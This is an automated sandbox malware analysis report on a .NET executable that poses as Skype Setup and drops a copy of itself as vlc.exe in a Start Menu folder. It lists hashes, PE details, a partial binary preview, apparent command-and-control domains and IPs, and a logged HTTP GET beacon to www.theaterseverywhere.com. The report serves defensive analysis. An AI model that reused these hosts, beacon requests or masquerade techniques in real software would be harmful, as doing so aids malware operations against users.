                                          Quote Request.xlsxGet hashmaliciousBrowse
                                          • 82.165.48.223
                                          anthony.exeGet hashmaliciousBrowse
                                          • 217.160.0.199
                                          8miw6WNHCt.exeGet hashmaliciousBrowse
                                          • 74.208.5.21
                                          WO4jeXWl0L.exeGet hashmaliciousBrowse
                                          • 74.208.45.104
                                          5YCsNuM4a9.exeGet hashmaliciousBrowse
                                          • 74.208.45.104
                                          eLaaw7SqMi.exeGet hashmaliciousBrowse
                                          • 74.208.5.22

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe5901777.xlsGet hashmaliciousBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.log
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1391
                                            Entropy (8bit):5.344111348947579
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                            MD5:E87C60A24438CC611338EA5ACB433A0A
                                            SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                            SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                            SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vlc.exe.log
                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1391
                                            Entropy (8bit):5.344111348947579
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                            MD5:E87C60A24438CC611338EA5ACB433A0A
                                            SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                            SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                            SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                            Malicious:false
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):552960
                                            Entropy (8bit):7.182147023805618
                                            Encrypted:false
                                            SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                            MD5:7E26E87AB642008D934824D509559859
                                            SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                            SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                            SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 29%
                                            Joe Sandbox View:
                                            • Filename: 5901777.xls, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@..................................n..W.................................................................................... ............... ..H............text...TO... ...P.................. ..`.rsrc................R..............@..@.reloc...............n..............@..B................0o......H........J..h$...........0...............................................0.............-.&(....+.&+.*....0..3........(......-.&..-.&..-.&.(....+.(....+.(....+.(....+.*..0.......... .....-.&s.....-.&sX....-.&.o....+..+..+...+..(.....o.....j2...+...(....r...p..H...........(......(.......*........o[.....o....t+...}....*...0.. .........{....r...po.....-.&&+.}....+.*.0..u........{....(.....-.&~....-I+..+. ....r_..p......(...........-.&....(......(....( ....-.&+..+.....+.~....{!..
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe:Zone.Identifier
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview: [ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.182147023805618
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
                                            File size:552960
                                            MD5:7e26e87ab642008d934824d509559859
                                            SHA1:3d4dc73fee1b191c2b942e28920c37c82d38b0ed
                                            SHA256:3176528c561817095af859f4809a2091f8557f93c27a0fe32ee71c8fc3b71f33
                                            SHA512:c51d64487f852b3d24c4f6b6c2eb79deac9394a607be1b8287bd087398b17b5403ddace34eb46fd0a5807e044ecc6869213ccef9eeda4604d7a1df711b691a2c
                                            SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:d098909eaab2a282

                                            Static PE Info

                                            General

                                            Entrypoint:0x446f4e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x5FC0BE0B [Fri Nov 27 08:51:23 2020 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x46ef40x57.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x41bd8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x44f540x45000False0.973933565444data7.97600028112IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x480000x41bd80x41c00False0.411054836027data5.84744042564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x484c00x3acdPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                            RT_ICON0x4bf900x668data
                                            RT_ICON0x4c5f80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4287137928, next used block 12320655
                                            RT_ICON0x4c8e00x1e8data
                                            RT_ICON0x4cac80x128GLS_BINARY_LSB_FIRST
                                            RT_ICON0x4cbf00x662aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                            RT_ICON0x5321c0xea8data
                                            RT_ICON0x540c40x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15987957, next used block 16184308
                                            RT_ICON0x5496c0x6c8data
                                            RT_ICON0x550340x568GLS_BINARY_LSB_FIRST
                                            RT_ICON0x5559c0x6014PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                            RT_ICON0x5b5b00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 2533359616, next used block 620756992
                                            RT_ICON0x6bdd80x94a8data
                                            RT_ICON0x752800x67e8data
                                            RT_ICON0x7ba680x5488data
                                            RT_ICON0x80ef00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16777215, next used block 520093696
                                            RT_ICON0x851180x25a8data
                                            RT_ICON0x876c00x10a8data
                                            RT_ICON0x887680x988data
                                            RT_ICON0x890f00x468GLS_BINARY_LSB_FIRST
                                            RT_GROUP_ICON0x895580x11edata
                                            RT_VERSION0x896780x35cdata
                                            RT_MANIFEST0x899d40x204XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyright(c) 2020 Skype and/or Microsoft
                                            Assembly Version8.65.0.76
                                            InternalNameCxnjmhojuh1.exe
                                            FileVersion8.65.0.76
                                            CompanyNameSkype Technologies S.A.
                                            CommentsSkype Setup
                                            ProductNameSkype
                                            ProductVersion8.65.0.76
                                            FileDescriptionSkype Setup
                                            OriginalFilenameCxnjmhojuh1.exe

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 27, 2020 15:58:33.396914005 CET4975080192.168.2.674.208.236.113
                                            Nov 27, 2020 15:58:33.533881903 CET804975074.208.236.113192.168.2.6
                                            Nov 27, 2020 15:58:33.534008026 CET4975080192.168.2.674.208.236.113
                                            Nov 27, 2020 15:58:33.534207106 CET4975080192.168.2.674.208.236.113
                                            Nov 27, 2020 15:58:33.671035051 CET804975074.208.236.113192.168.2.6
                                            Nov 27, 2020 15:58:33.681374073 CET804975074.208.236.113192.168.2.6
                                            Nov 27, 2020 15:58:33.681425095 CET804975074.208.236.113192.168.2.6
                                            Nov 27, 2020 15:58:33.681441069 CET804975074.208.236.113192.168.2.6
                                            Nov 27, 2020 15:58:33.681639910 CET4975080192.168.2.674.208.236.113
                                            Nov 27, 2020 15:58:33.681781054 CET4975080192.168.2.674.208.236.113
                                            Nov 27, 2020 15:58:33.818573952 CET804975074.208.236.113192.168.2.6
                                            Nov 27, 2020 15:58:55.095927954 CET4975880192.168.2.652.58.78.16
                                            Nov 27, 2020 15:58:55.112649918 CET804975852.58.78.16192.168.2.6
                                            Nov 27, 2020 15:58:55.112831116 CET4975880192.168.2.652.58.78.16
                                            Nov 27, 2020 15:58:55.112926960 CET4975880192.168.2.652.58.78.16
                                            Nov 27, 2020 15:58:55.129580975 CET804975852.58.78.16192.168.2.6
                                            Nov 27, 2020 15:58:55.129667997 CET804975852.58.78.16192.168.2.6
                                            Nov 27, 2020 15:58:55.129729033 CET804975852.58.78.16192.168.2.6
                                            Nov 27, 2020 15:58:55.130250931 CET4975880192.168.2.652.58.78.16
                                            Nov 27, 2020 15:58:55.130465031 CET4975880192.168.2.652.58.78.16
                                            Nov 27, 2020 15:58:55.147123098 CET804975852.58.78.16192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 27, 2020 15:57:32.229760885 CET5378153192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:32.256953955 CET53537818.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:33.055875063 CET5406453192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:33.091309071 CET53540648.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:43.564912081 CET5281153192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:43.591944933 CET53528118.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:44.428431034 CET5529953192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:44.455573082 CET53552998.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:53.035280943 CET6374553192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:53.070861101 CET53637458.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:54.414926052 CET5005553192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:54.451869011 CET53500558.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:54.472253084 CET6137453192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:54.507540941 CET53613748.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:55.716264009 CET5033953192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:55.743356943 CET53503398.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:56.532305956 CET6330753192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:56.559402943 CET53633078.8.8.8192.168.2.6
                                            Nov 27, 2020 15:57:57.663681984 CET4969453192.168.2.68.8.8.8
                                            Nov 27, 2020 15:57:57.699119091 CET53496948.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:04.349950075 CET5498253192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:04.385519981 CET53549828.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:04.915282965 CET5001053192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:04.950737953 CET53500108.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:05.845258951 CET6371853192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:05.880856037 CET53637188.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:06.083427906 CET6211653192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:06.118822098 CET53621168.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:06.220453978 CET6381653192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:06.256165981 CET53638168.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:06.627125025 CET5501453192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:06.662755966 CET53550148.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:07.342999935 CET6220853192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:07.378743887 CET53622088.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:07.948687077 CET5757453192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:07.975754976 CET53575748.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:08.783049107 CET5181853192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:08.818336964 CET53518188.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:09.243026018 CET5662853192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:09.293510914 CET53566288.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:09.718720913 CET6077853192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:09.745874882 CET53607788.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:10.305634022 CET5379953192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:10.332758904 CET53537998.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:11.581770897 CET5468353192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:11.625076056 CET53546838.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:17.165414095 CET5932953192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:17.200875044 CET53593298.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:23.159578085 CET6402153192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:23.195239067 CET53640218.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:24.009538889 CET5612953192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:24.044955969 CET53561298.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:33.350066900 CET5817753192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:33.390670061 CET53581778.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:38.151173115 CET5070053192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:38.195622921 CET53507008.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:42.778146029 CET5406953192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:42.805150986 CET53540698.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:43.748873949 CET6117853192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:43.784307003 CET53611788.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:46.229530096 CET5701753192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:46.264960051 CET53570178.8.8.8192.168.2.6
                                            Nov 27, 2020 15:58:55.042613029 CET5632753192.168.2.68.8.8.8
                                            Nov 27, 2020 15:58:55.094605923 CET53563278.8.8.8192.168.2.6
                                            Nov 27, 2020 15:59:15.481240034 CET5024353192.168.2.68.8.8.8
                                            Nov 27, 2020 15:59:16.492161989 CET5024353192.168.2.68.8.8.8
                                            Nov 27, 2020 15:59:17.137989044 CET53502438.8.8.8192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 27, 2020 15:57:54.414926052 CET192.168.2.68.8.8.80x8c94Standard query (0)cdn.onenote.netA (IP address)IN (0x0001)
                                            Nov 27, 2020 15:58:11.581770897 CET192.168.2.68.8.8.80x45ecStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                            Nov 27, 2020 15:58:33.350066900 CET192.168.2.68.8.8.80x674dStandard query (0)www.theaterseverywhere.comA (IP address)IN (0x0001)
                                            Nov 27, 2020 15:58:46.229530096 CET192.168.2.68.8.8.80x6f22Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                            Nov 27, 2020 15:58:55.042613029 CET192.168.2.68.8.8.80x8a6fStandard query (0)www.privateinvestigationsanjose.comA (IP address)IN (0x0001)
                                            Nov 27, 2020 15:59:15.481240034 CET192.168.2.68.8.8.80x9a59Standard query (0)www.xn--mgbaht9hj11byu.comA (IP address)IN (0x0001)
                                            Nov 27, 2020 15:59:16.492161989 CET192.168.2.68.8.8.80x9a59Standard query (0)www.xn--mgbaht9hj11byu.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 27, 2020 15:57:54.451869011 CET8.8.8.8192.168.2.60x8c94No error (0)cdn.onenote.netcdn.onenote.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                            Nov 27, 2020 15:58:11.625076056 CET8.8.8.8192.168.2.60x45ecNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                            Nov 27, 2020 15:58:33.390670061 CET8.8.8.8192.168.2.60x674dNo error (0)www.theaterseverywhere.com74.208.236.113A (IP address)IN (0x0001)
                                            Nov 27, 2020 15:58:46.264960051 CET8.8.8.8192.168.2.60x6f22No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                            Nov 27, 2020 15:58:55.094605923 CET8.8.8.8192.168.2.60x8a6fNo error (0)www.privateinvestigationsanjose.com52.58.78.16A (IP address)IN (0x0001)
                                            Nov 27, 2020 15:59:17.137989044 CET8.8.8.8192.168.2.60x9a59No error (0)www.xn--mgbaht9hj11byu.com185.88.152.152A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.theaterseverywhere.com
                                            • www.privateinvestigationsanjose.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.64975074.208.236.11380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 27, 2020 15:58:33.534207106 CET6858OUTGET /gwg/?9rn=O2JDHJlpz2Rt546p&kzrh28=UuziJZlLt+87/GFWj6zrBRQcAJHtDZRD1SjQzE3VTJ8o0dUkW9Z3aESqk1e2d0LlVQYkCVOcaQ== HTTP/1.1
                                            Host: www.theaterseverywhere.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 27, 2020 15:58:33.681374073 CET6859INHTTP/1.1 404 Not Found
                                            Content-Type: text/html
                                            Content-Length: 1364
                                            Connection: close
                                            Date: Fri, 27 Nov 2020 14:58:33 GMT
                                            Server: Apache
                                            X-Frame-Options: deny
